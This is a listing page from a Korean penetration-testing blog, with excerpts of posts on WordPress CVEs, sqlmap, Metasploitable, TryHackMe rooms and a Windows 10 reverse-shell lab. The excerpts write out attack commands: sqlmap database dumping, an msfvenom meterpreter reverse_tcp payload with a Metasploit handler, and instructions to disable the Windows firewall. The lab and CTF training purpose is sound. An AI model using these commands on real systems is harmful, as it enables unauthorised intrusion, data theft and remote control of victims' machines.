칼리리눅스 8

[CVE-2020-8772] Wordpress 1.9.4.5 Authentication Bypass

CVE-2020-8772 세부정보- 인증우회 취약점 - Authentication Bypass- 관리자 계정 이름만 만 있어도 로그인 가능 CVE-2020-8772 설명CVE-2020-8772 취약점은 1.9.4.5 버전에서 발견된 인증우회 - Authentication Bypass 취약점 입니다 이 취약점은 플러그인에 iwp_mmb_set_request 라는 함수에서 인증우회를 할수있는 점에서 발생한다. 공격자는 Wordpress 관리자 계정에 이름만 알고있어도 로그인을 할수있다. POC 제작https://blog.sunggwanchoi.com/kor-infinitewp-client-1-9-4-5-authentication-bypass/ [KOR] 취약점 분석 - CVE-2020-8772들어가며 이 글..

취약점 | CVE 2024.11.17

[CVE-2024-1017] [POC] Wordpress SQL 인젝션 취약점

CVE-2024-1070 세부정보취약점 종류 : SQL INJECTION Ultimate Member 플러그인 SQL INJECTION 취약점Ultimate Member 플러그인은 사용자 프로필, 등록, 로그인, 회원 디렉토리, 콘텐츠 제한 및 회원 자격을 관리하는 WordPress 플러그인입니다. 하지만 버전 2.1.3부터 2.8.2까지의 이 플러그인은 사용자가 제공한 입력을 제대로 검증하지 않아서 SQL 인젝션 공격에 취약합니다.https://nvd.nist.gov/vuln/detail/CVE-2024-1071 NVD - CVE-2024-1071CVE-2024-1071 Detail Awaiting Analysis This vulnerability is currently awaiting analysis..

취약점 | CVE 2024.10.01

SQL INJECTION | SQLMAP - 웹 모의해킹

SQLMAP 이란?sql injection 취약점을 사용하여 여러가지 SQL 문법들과 여러가지 조합들을 활용하고DB 서버 침투까지 지원하는 툴(TOOL) 이다.SQLMAP 사용법.sqlmap -u "http://example.com/page.php?id=1"-u 요청할 urlsqlmap -u "http://example.com/page.php?id=1" --dbs--dbs 데이터베이스 가져오기sqlmap -u "http://example.com/page.php?id=1" --tables -D database_name데이터 베이스 정보추출. sqlmap -u "http://example.com/page.php?id=1" --columns -D database_name -T table_name테이블 컬륨 확..

KALI LINUX 칼리 리눅스 | metasploitable2 모의해킹

metasploitable3 환경 NMAP 스캔 및 취약점 nmap -sV -sC [IP]   취약점 설명 vsftpd 2.3.4 backdoor 백도어(backdoor) 취약점 이므로 원격으로 접속해 권한을 취득하거나 악성코드를 실행하는 방법이다 https://nordvpn.com/ko/blog/backdoor-attack-meaning/?srsltid=AfmBOopga12Kggkqj5drBUuLytCdgrjoH8eh7mYpK8GbvJ-_NYPht8v5 백도어 공격이란 무엇인가요?백도어는 일반적으로 컴퓨터, 제품, 모바일 장치 등에서 정상적인 인증 또는 암호화를 우회하는 접근 액세스입니다. 하지만 이러한 액세스를 악용하는 백도어 공격은 많은 사람을 위험에 빠뜨nordvpn.com  set RHOSTS ..

TryHackMe | Windows PrivEsC 모의해킹 Task1,Task2

TASK 1 Deploy the Vulnerable Windows VM설명현재 이 랩은 다양한 권한 상승을 소개하는데 중점을 두고있습니다 Tib3rius 가 만들었고 Windows Privilege Escalation for OSCP and Beyond 중점을 둔 랩이라고 보시면 됩니다 RDP는 포트 3389에서 사용 가능해야 합니다 (서비스가 시작되기까지 몇 분이 걸릴 수 있습니다). "user" 계정으로 로그인하려면 비밀번호는 "password321"입니다 xfreerdp /u:user /p:password321 /cert:ignore /v:[IP]위와같이 들어가시면 됩니다 TASK 2  Generate a Reverse Shell Executable설명  오케이 좋습니다 이제 msfvenom 모듈을..

TryHackMe | CTF 2024.09.08

KALI LINUX | 윈도우 10 모의해킹 Reverse_tcp

Metasploit & msfvenom 활용해 윈도우 10 모의침투.윈도우 10 방화벽 설정 설정관리 메뉴 클릭 이와 똑같이 다 끄기 Msfvenom 설정아래와 같이 작성 msfvenom -p windows/meterpreter/reverse_tcp LHOST=자신의 IP LPORT=4444 -f exe > 파일이름.exe  이런식으로 뜨면 성공 !  msfvenom 으로 만든 악성파일이 보임. Metasploit 설정 메타스플로잇 실행 모듈 설정 msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp  msf6 exploit(multi/handler) > set payload /windows/meter..

TryHackMe | Simple CTF [웹해킹] [모의해킹] [CTF]

TASK 1 Simple CTF 1. Answer : 1000포트 아래 포트들이 얼마나 운영중인가요? nmap -sV -sC -sT -Pn --script vuln 10.10.31.249 2. Answer : 가장높은 포트는 어떤 서비스를 이용중인가요?3. Answer : 해당 웹애플리케이션이 가지고있는 cve 취약점은 무엇인가요? apache 2 서비스를 운영중인 웹 애플리케이션이다. gobuster 툴을 이용해 숨겨진 경로를 확인해보자 gobuster dir -u [IP] -w [wordlist] /simple               (Status: 301) [Size: 313] [--> http://10.10.31.249/simple/]CMS 2.2.8 버전이다. 해당 CMS 2.2.8 버전은 S..

TryHackMe | CTF 2024.09.01